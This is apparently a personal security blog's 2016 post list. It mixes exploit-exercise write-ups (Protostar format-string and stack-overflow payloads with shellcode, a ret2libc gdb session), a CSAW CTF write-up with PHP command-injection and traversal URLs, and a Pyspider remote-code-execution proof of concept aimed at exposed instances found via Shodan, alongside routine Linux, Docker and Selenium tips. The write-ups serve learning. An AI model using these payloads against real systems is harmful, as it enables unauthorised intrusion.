Posts

Showing posts from 2016

Exploit Exercises - Format String

Format1: Padding to last mem dump run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x Write run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n DMA /opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'` Format2 need write value to address: POC: python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo |Address|Value|Padding|%n DMA python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2 Format3: write 4 byte with speacify address: POC: python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\

Exploit Exercises - Protostar Stack 7

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it. Found pop pop ret at: 0x08048492 This payload: | "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code | This is shell code: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80 Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc: (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) And run it: (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"

Exploit Exercises - Protostar Stack 6

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib. Use gdb, disassembly: #gdb -q /opt/protostar/bin/stack6  (gdb) disas main Dump of assembler code for function main: 0x080484fa :    push   %ebp 0x080484fb :    mov    %esp,%ebp 0x080484fd :    and    $0xfffffff0,%esp 0x08048500 :    call   0x8048484 0x08048505 :   mov    %ebp,%esp 0x08048507 :   pop    %ebp 0x08048508 :   ret   End of assembler dump.  (gdb) disas getpath Dump of assembler code for function getpath: 0x08048484 : push   %ebp 0x08048485 : mov    %esp,%ebp 0x08048487 : sub    $0x68,%esp 0x0804848a : mov    $0x80485d0,%eax 0x0804848f :        mov    %eax,(%esp) 0x08048492 :        call   0x80483c0 0x08048497 :        mov    0x8049720,%eax 0x0804849c :        mov    %eax,(%esp) 0x0804849f :        call   0x80483b0 0x080484a4 :        lea    -0x4c(%ebp),%eax 0x080484a7 :        mov    %eax,(%esp) 0x080484aa :        call

Some experience when use Docker

In this week, my job is set up ELK with Suricata. I choose docker is platform to run all. Now, i had some experience about docker. Use docker-compose. It is very good deployment for production, build && run. Install docker-compose via pip. Use build image to create your custom start-up distro. I used docker compose version 2 syntax, notice different with version, like network and net Use network --net if you need monitor, or use all card You can not use cd command, must use WORKDIR. Read Dockerfile document very carefully. Use links, when use it, it run links container before. You can run manual, and start main container after. Must sure it started. In docker command, must use command to hold tty, like: suricata -c xxx or python manager server 0.0.0.0:8080 ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco L

Tampermonkey HelloWorld and create menuCommand

Image
Today, i need write one script with tampermonkey. It is very hard :(. To write helloworld. Create new script. Edit config: Add // @connect      * // @match        http://*/* // @match        https://*/* You can edit author, homepage, etc.. Add your code in main code in comment. I used console.log()  This is result: I need create button in menu, so i used: Edit config, remove grant none and add: // @grant        GM_registerMenuCommand You will see new menu button in tamper monkey. ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.

[Writeup] CSAW CTF 2016

Image
mfw (125) This main url: http://web.chal.csaw.io:8000 Fuzz it to easy: http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27 Play with flag http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27 flag{3vald_@ss3rt_1s_best_a$$ert} wtf.sh 1 (150) http://web.chal.csaw.io:8001 Register one account, logined. Create post, view post Fuzzing now, i found directory traversal (WTF? traversal again) When fuzz to: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess may be can read all file in this directoty, like cat * :)). I found some interesting function (after use decoder to view beautifull code): function hash_password {     local password=$1;     (shasum <<< ${password}) | cut -d\  -f1; } # hash usernames for lookup in the users_lookup table function hash_username {     local username=$1;     (shasum <<< ${username}) | cut -d\  -f1; } # generate a random token, bas

RCE in Pyspider

Image
Today i read one articles about exploit debug mode in Werkzeug. It old, but very interesting. When i try to find website in shodan, i found 30s website use pyspider. Pyspider is python opensource, you can download and install it from: https://github.com/binux/pyspider It had one problem, it not authentication. Anyone can access. When click to one process, you can go to debug mode. And you can edit python code. So, you can use it to run code execute. It is RCE. This is my POC:        import subprocess         p = subprocess.Popen(["id","-m"], stdout=subprocess.PIPE)         output, err = p.communicate()         print(output) ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.

Install Skype and Facebook Message Plugin for Ubuntu

In windows, easy to install Facebook App, Skype App. But on Ubuntu, i need one app for 2 services. So i choose pidgin. 1. Install Facebook plugin: We use purple-facebook: sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/ /' >> /etc/apt/sources.list.d/jgeboski.list" cd /tmp && wget  http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/Release.key sudo apt-key add - < Release.key sudo apt-get update sudo apt-get install purple-facebook Add your facebook account in Manager Account. 2. Install Skype plugin: We use skypeweb: sudo apt-get install libpurple-dev libjson-glib-dev cmake gcc git clone git://github.com/EionRobb/skype4pidgin.git cd skype4pidgin/skypeweb mkdir build cd build cmake .. cpack sudo dpkg -i skypeweb-1.1.0-Linux.deb Add your skype account in Manager Account. ---------------------------------------------------------- Thanks for reading

Use marco to Anti-CSRF token in Burpsuite

Image
When i am reading one paper about Burpsuite trick , this talk about: Burpsuite marco, and we can use it to anti-csrf token. I tried it with this demo:  http://www.businessinfo.co.uk/labs/csrf_defend/form_token_demo_stage2.php First request to get token in htlm (formtoken), and post request (request 2) use it to check. Now, we need use marco to automatic get token, add to post data. Make sure 2 request and response in http proxy, and intercept is off Go to project options (version > 1.7) or options (<=1.6, i not sure). I used pro version. Chose Session tab. In session handing rules, add new rule: Type your rule name, like Anti CSRF Rule for xx.com. In rule action, choose Add, with "run post-request marco" type. You can see Action handing editor. Add new marcos by click add, new marco editor and marco recorder windows open Now, in marco recorder you must choose 2 request. request 1 is request get token, and request 2 is action request use token (cho

Automount partition in Ubuntu with fstab

Before use Ubuntu, i installed windows OS. I had 2 partitions in nfts, its not auto mount, only mount when i click in local disk icon. So i need auto load it, to run many application in this partitions. First, i need find ssid of partition in: /dev/disk/by-uuid. Then, edit /etc/fstab. Add:  UUID=327E4E257E4DE1E9 /mnt/sdb1/ ntfs   rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000 0 0 UUID=38D822D9D82294E2   /mnt/sdb2/      ntfs    rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000   0       0 Whit UUID i founded, and uid is id of my user. To add this location to menu bar, use "Bookmark this location" of Gnome. ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.

Some experience while working with ElasticSearch, Angular

In this week, i join one project need program web portal. My hobby is Python so i chose Flask, Angular JS. I`m using bootstrap to make css template. My DB is ElasticSearch. I don`t use http request to make query ES, i used python-es lib. So, when use ES, i have some problems. 1. Sort in ES:             data = self.es.search(index=self.indexName, doc_type=self.docType,                                   body={"query": {                                       "filtered": {                                           "query": {                                               "bool": {                                                   "must": mustDict,                                               },                                           }                                       }                                   },                                       "size": size, "from": from_, "sort": {"ti

Popup interactive in Selenimum

When develop AWATT tool, i got this problem: after click, pop up alert windows show and must confirm (accept, dismiss) to continue. You can not use selector of selenium to control it. This is  solution: from selenium import webdriver import time url = "http://www.javascripter.net/faq/alert.htm" driver = webdriver.Firefox() driver.get(url) element = driver.find_element_by_xpath("//input[@type='button']") element.click() alert = driver.switch_to_alert() time.sleep(2) alert.accept() # alert.dismiss() ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.

File Upload with Selenium

Yesterday, my brother asked me: "How to automatic upload a file with Selenium". Today, i had free time to solve it. Try this code. I used python blinding: from selenium import webdriver url = "https://encodable.com/uploaddemo/" driver = webdriver.Firefox() driver.get(url) element = driver.find_element_by_id("uploadname1") element.send_keys("/home/habachnam/a.txt") ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.

Install Metasploit Ubuntu quick way

Install Metasploit in Ubuntu: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \   chmod 755 msfinstall && \   ./msfinstall Now, u can use apt-get update to update metasploit ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.

Get a Unity-like appmenu (global menu) in Ubuntu Gnome Session Fallback

When i use Ubuntu, first thing is install gnome-session-fallback. Because i like classic app menu. But if u use Hopper Disassembler, i only run in unity (to display app menu). I found way to display app menu in gnome-session-fallback: sudo apt-get install indicator-applet-appmenu After install it, move mouse to top panel, use Windows (Supper) key + Alt + Right Click, chose Add to panel/ select indicator-applet-appmenu, chose Add. Now, you can use Unity app-menu ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.